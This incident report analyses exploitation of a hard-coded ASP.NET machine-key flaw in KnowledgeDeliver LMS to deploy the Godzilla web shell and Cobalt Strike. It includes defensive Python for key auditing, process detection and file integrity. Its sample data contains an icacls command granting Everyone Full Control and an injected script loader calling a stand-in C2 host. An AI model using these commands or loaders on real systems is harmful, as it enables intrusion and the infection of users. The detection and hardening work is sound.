Full Report
A now-patched high-severity security flaw affecting Digital Knowledge KnowledgeDeliver, a Learning Management System (LMS) popular in Japan, was exploited as a zero-day to deliver the Godzilla web shell and ultimately facilitate the deployment of Cobalt Strike Beacon. The vulnerability, tracked as CVE-2026-5426 (CVSS score: 7.5), stems from the use of hard-coded ASP.NET machine keys, leading to
Analysis Summary
# Incident Report: Exploitation of KnowledgeDeliver LMS via CVE-2026-5426
## Executive Summary
A high-severity zero-day vulnerability in the Digital Knowledge KnowledgeDeliver LMS was exploited to achieve unauthenticated remote code execution (RCE). Because the product shipped with hard-coded ASP.NET machine keys, attackers could forge ViewState payloads that the server accepted and deserialized; they used this to deploy the Godzilla web shell, then tampered with the platform's legitimate JavaScript so that end-users were prompted to install a fake "security authentication plugin" that delivered Cobalt Strike Beacon. The campaign therefore turned the LMS itself into the infection vector for its own users.
## Incident Details
- **Discovery Date:** Not stated in the report; publicly disclosed May 26, 2026.
- **Incident Date:** Active exploitation occurred before the February 24, 2026 patch (zero-day period).
- **Affected Organization:** Users of Digital Knowledge KnowledgeDeliver LMS
- **Sector:** Education / Learning Management
- **Geography:** Japan (Primary market for the software)
## Timeline of Events
### Initial Access
- **Date/Time:** Pre-February 2026 (Zero-day period)
- **Vector:** ViewState Deserialization (CVE-2026-5426)
- **Details:** KnowledgeDeliver shipped with fixed `machineKey` values (`validationKey`/`decryptionKey`) in `web.config`, identical across installations. ASP.NET trusts any ViewState whose MAC validates under the validation key, so anyone holding the shipped values can sign a ViewState blob carrying a deserialization gadget and have the server execute it without authenticating, in the context of the IIS worker process (`w3wp.exe`).
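The check a practitioner wants after reading the above is whether their own `web.config` carries explicit machine keys and whether those keys are ones the world already knows. The following is an added example written for this write-up, not tooling from the Mandiant/GTIG report or from Digital Knowledge: it parses a constructed `web.config`, flags disabled ViewState MAC validation and explicit keys, matches key hashes against a constructed denylist (the placeholder values are not the real KnowledgeDeliver keys), and mints a fresh per-installation `machineKey` element.

```python
"""Audit an ASP.NET web.config for machineKey weaknesses and mint a unique
replacement. Added example for this write-up, not tooling from the report
or from Digital Knowledge; the sample config and the denylist are constructed
(the key values are placeholders, not the actual KnowledgeDeliver keys)."""
import hashlib
import secrets
import xml.etree.ElementTree as ET

# Constructed web.config in the shape of a vendor deployment template:
# explicit keys that every customer installation would share.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="true" />
    <machineKey validationKey="{v}" decryptionKey="{d}"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>""".format(v="AB" * 64, d="CD" * 32)

# Constructed denylist: SHA-256 of keys known to be public. In practice this
# is built from vendor templates, documentation and published disclosed-key
# hashes; hashing means the audit tool itself never carries the raw keys.
KNOWN_DISCLOSED_KEY_HASHES = {hashlib.sha256(("AB" * 64).encode()).hexdigest()}


def key_hash(hex_key):
    # Hex keys are case-insensitive; normalize before hashing.
    return hashlib.sha256(hex_key.upper().encode()).hexdigest()


def audit_web_config(xml_text):
    """Return findings as 'SEVERITY: message' strings for one web.config."""
    findings = []
    root = ET.fromstring(xml_text)
    pages = root.find("system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("HIGH: enableViewStateMac=false, ViewState is accepted without a MAC")
    mk = root.find("system.web/machineKey")
    if mk is None:
        return findings  # runtime default is AutoGenerate,IsolateApps: per-machine keys
    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr, "AutoGenerate")
        if value.startswith("AutoGenerate"):
            continue
        findings.append(f"INFO: {attr} is set explicitly (acceptable only if unique to this deployment or farm)")
        if key_hash(value) in KNOWN_DISCLOSED_KEY_HASHES:
            findings.append(f"HIGH: {attr} matches a publicly disclosed key; treat ViewState MAC as forgeable")
    return findings


def generate_machine_keys():
    """Fresh per-installation keys: 64-byte HMACSHA256 validation key and
    32-byte AES decryption key, hex-encoded as the machineKey element expects."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
    }


def render_machine_key_element(keys):
    return (
        f'<machineKey validationKey="{keys["validationKey"]}" '
        f'decryptionKey="{keys["decryptionKey"]}" '
        'validation="HMACSHA256" decryption="AES" />'
    )


if __name__ == "__main__":
    for finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print(finding)
    print(render_machine_key_element(generate_machine_keys()))
```

An explicit key is only an informational finding because web farms legitimately pin one key across nodes; the failure mode here is a key that is the same across unrelated customers or that appears in a public source, which is what the denylist match catches. When re-keying, apply the new element to every node of a farm at once: ViewState and forms-authentication tickets issued under the old key stop validating the moment the key changes.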
### Lateral Movement
- **Details:** After gaining code execution, the threat actor ran commands that changed file-system permissions on the web application directory, granting the "Everyone" group Full Control. Strictly this is not movement to another host: it removes access restrictions on the directory so that later file drops and JavaScript tampering within the application succeed and persist.
### Data Exfiltration/Impact
- **Details:** The primary impact was the compromise of the platform's integrity. Attackers injected malicious scripts into legitimate JavaScript files to deliver Cobalt Strike Beacon to unsuspecting users via a "fake plugin" prompt.
### Detection & Response
- **How it was discovered:** Identified by Google Mandiant and Google Threat Intelligence Group (GTIG).
- **Response actions taken:** Digital Knowledge released a patch for KnowledgeDeliver on February 24, 2026, to address the hard-coded keys.
## Attack Methodology
- **Initial Access:** Exploitation of CVE-2026-5426 (ViewState Deserialization).
- **Persistence:** Implementation of the Godzilla (BLUEBEAM) web shell.
- **Privilege Escalation:** Weakening ACLs on the web application directory (Everyone: Full Control); no escalation beyond the web server's own account is described.
- **Defense Evasion:** Use of encrypted Cobalt Strike payloads tailored with the victim organization's name to bypass generic detection.
- **Credential Access:** Not explicitly detailed, though web shells typically allow for harvesting.
- **Discovery:** The hard-coded ASP.NET machine keys had been publicly disclosed, so vulnerable KnowledgeDeliver instances could be identified and exploited without per-target recovery of the keys; post-compromise host discovery is not detailed.
- **Lateral Movement:** Shifting from server compromise to client-side infection (Watering Hole attack).
- **Collection:** Targeting user machines via fake "security authentication plugin" installers.
- **Exfiltration:** Not specified, but Cobalt Strike was used for command-and-control (C2).
- **Impact:** Unauthorized code injection and deployment of malware to end-users.
## Impact Assessment
- **Financial:** Costs associated with incident response and potential legal liabilities regarding user infection.
- **Data Breach:** Exposure of server-side configurations and potential theft of user session data.
- **Operational:** Disruption of learning services and the need for urgent infrastructure patching and malware removal.
- **Reputational:** Significant impact due to the platform being used as a vector to infect its own customers.
## Indicators of Compromise
- **Network indicators:**
- Traffic to attacker-controlled domains hosting malicious scripts (e.g., `[attacker_domain].com`)
- Cobalt Strike C2 traffic (specific C2 addresses are not given in the report)
- **File indicators:**
- Godzilla (BLUEBEAM) web shell files.
- Tampered application JavaScript files.
- Fake "security authentication plugin" installers.
- **Behavioral indicators:**
- Unexpected modifications to web application folder permissions (e.g., "Everyone: Full Control").
- Web server processes (w3wp.exe) spawning suspicious command-line shells.
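The two behavioral indicators above are the ones most worth turning into detection logic, because they fire before any network IoC is needed. The block below is an added example for this write-up, not detection content from Mandiant/GTIG: it runs over constructed process-creation events (field names loosely follow Sysmon Event ID 1; every event, pid and path is invented) and raises an alert when an interpreter descends from `w3wp.exe` or when `icacls`/`cacls` grants Everyone Full Control, rating the latter higher when it happens under the web worker.

```python
"""Detection logic for the two behavioral indicators listed above, run over
constructed process-creation events. Added example for this write-up, not
detection content from Mandiant/GTIG; the event shape loosely follows Sysmon
Event ID 1 fields and every event below is invented."""
import re

# Interpreters and LOLBins a web shell commonly spawns from the IIS worker.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "certutil.exe", "rundll32.exe"}

# icacls/cacls granting Everyone (or its SID S-1-1-0) Full Control, e.g.
#   icacls C:\inetpub\wwwroot\app /grant Everyone:(OI)(CI)F /T
ACL_WEAKENING = re.compile(
    r"\b(?:icacls|cacls)\b.*(?:everyone|\*?S-1-1-0):(?:\([A-Z]+\))*F\b",
    re.IGNORECASE)

# Constructed events: pids 2000/2001 are the malicious chain, the rest are benign.
EVENTS = [
    {"ProcessId": 1000, "ParentProcessId": 500,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "KnowledgeDeliver"'},
    {"ProcessId": 2000, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ProcessId": 2001, "ParentProcessId": 2000,
     "Image": r"C:\Windows\System32\icacls.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'icacls "C:\inetpub\wwwroot\kd" /grant Everyone:(OI)(CI)F /T'},
    {"ProcessId": 3000, "ParentProcessId": 800,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"ProcessId": 3001, "ParentProcessId": 3000,
     "Image": r"C:\Windows\System32\icacls.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'icacls "C:\inetpub\wwwroot\kd" /grant "IIS AppPool\kd":(OI)(CI)R'},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def descends_from(event, ancestor, by_pid):
    """Walk the parent chain (bounded, cycle-safe) looking for an ancestor image."""
    seen, cur = set(), event
    while cur is not None and cur["ProcessId"] not in seen:
        seen.add(cur["ProcessId"])
        if basename(cur["ParentImage"]) == ancestor:
            return True
        cur = by_pid.get(cur["ParentProcessId"])
    return False


def detect(events):
    """Return (pid, alert) tuples; ACL weakening under w3wp.exe is rated high."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        from_web = descends_from(e, "w3wp.exe", by_pid)
        if basename(e["Image"]) in SHELL_IMAGES and from_web:
            alerts.append((e["ProcessId"], "shell spawned under w3wp.exe"))
        if ACL_WEAKENING.search(e["CommandLine"]):
            sev = "high" if from_web else "medium"
            alerts.append((e["ProcessId"], f"Everyone granted Full Control on a path ({sev})"))
    return alerts


if __name__ == "__main__":
    for pid, msg in detect(EVENTS):
        print(pid, msg)
```

Walking the parent chain rather than looking only at the direct parent matters here: the `icacls` in the sample is a grandchild of `w3wp.exe` (via `cmd.exe`), which a parent-only rule would rate as an ordinary administrative command. In production the same logic runs against Sysmon or 4688 events with command-line logging enabled; the ACL rule also catches the same grant expressed through `cacls` or the well-known SID.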
## Response Actions
- **Containment measures:** Isolation of infected web servers.
- **Eradication steps:** Removal of the Godzilla web shell and restoration of tampered JavaScript files from clean backups.
- **Recovery actions:** Updating KnowledgeDeliver to the patched version (released February 24, 2026), which replaces the shipped keys with unique machine keys; after the update, confirm that `web.config` no longer contains the original `validationKey`/`decryptionKey` values.
## Lessons Learned
- **Shared Secrets:** Using standardized, hard-coded secrets (`machineKey`) in deployment templates creates a single point of failure for an entire ecosystem.
- **Supply Chain Risk:** Popular regional software can be a high-value target for zero-day exploitation.
- **Endpoint Monitoring:** Monitoring for unexpected permission changes in web directories can lead to earlier detection of web shell activity.
## Recommendations
- **Rotate Secrets:** Ensure every ASP.NET deployment uses unique, non-default `machineKey` values; any application whose keys appear in a vendor template, documentation, or other public source should be re-keyed now. Re-keying invalidates existing ViewState and forms-authentication tickets, and on a web farm the new key must be applied to every node together.
- **File Integrity Monitoring:** Baseline the web root and alert on any change to JS files, `web.config`, or newly dropped `.aspx`/`.ashx` handlers; where possible deploy the web root as immutable content so that any write is itself an alert.
- **Patch Management:** Prioritize patching systems that utilize ViewState or similar deserialization mechanisms.
- **User Education:** Advise users to only download plugins from official, verified sources and to be wary of sudden "security alerts" within the LMS.
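The file-integrity recommendation above is simple to implement and would have surfaced both the dropped web shell and the injected JavaScript described in this report. The following is an added example for this write-up, not the report's or the vendor's tooling: it baselines SHA-256 hashes of deployable files under a web root, persists the manifest as JSON (off-host in practice), and classifies later changes as modified, added or removed; `demo()` builds a constructed web root in a temporary directory and tampers with it the way the report describes.

```python
"""File-integrity baseline for an IIS web root: hash every deployable file,
store the manifest off-host, and report anything modified, added or removed.
Added example for this write-up (not the report's or the vendor's tooling);
demo() builds a throwaway web root in a temporary directory."""
import hashlib
import json
import os
import tempfile

# Content an attacker changes or drops: client scripts, config, and any
# handler type that IIS will execute if written into the web root.
WATCHED_EXTS = {".js", ".config", ".aspx", ".ashx", ".asmx", ".dll"}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map of forward-slash relative path -> SHA-256 for watched files under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in WATCHED_EXTS:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = sha256_file(full)
    return baseline


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Classify differences. 'added' catches dropped web shells, 'modified'
    catches injected loaders in otherwise legitimate files."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario: baseline a clean root, then tamper with it the way
    the report describes (script injection plus a dropped .aspx handler)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "scripts"))
        with open(os.path.join(root, "scripts", "app.js"), "w") as f:
            f.write("console.log('lms');\n")
        with open(os.path.join(root, "web.config"), "w") as f:
            f.write("<configuration/>\n")
        with open(os.path.join(root, "readme.txt"), "w") as f:
            f.write("not watched\n")
        manifest = os.path.join(root, "baseline.json")  # keep off-host in practice
        save_baseline(build_baseline(root), manifest)
        # Tampering: loader appended to a legitimate script, web shell dropped.
        with open(os.path.join(root, "scripts", "app.js"), "a") as f:
            f.write('var s=document.createElement("script");'
                    's.src="https://c2.invalid/plugin.js";document.head.appendChild(s);\n')
        with open(os.path.join(root, "upload.aspx"), "w") as f:
            f.write('<%@ Page Language="C#" %>\n')
        return compare(load_baseline(manifest), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The manifest should be written at deployment time from a known-good build and stored where the web server's account cannot modify it; a baseline kept writable inside the web root is exactly what the Everyone: Full Control change in this incident would have let the attacker re-sign. Scheduled comparison plus an alert on any non-empty `added` or `modified` list is enough to catch both the web shell and the tampered JavaScript within one interval.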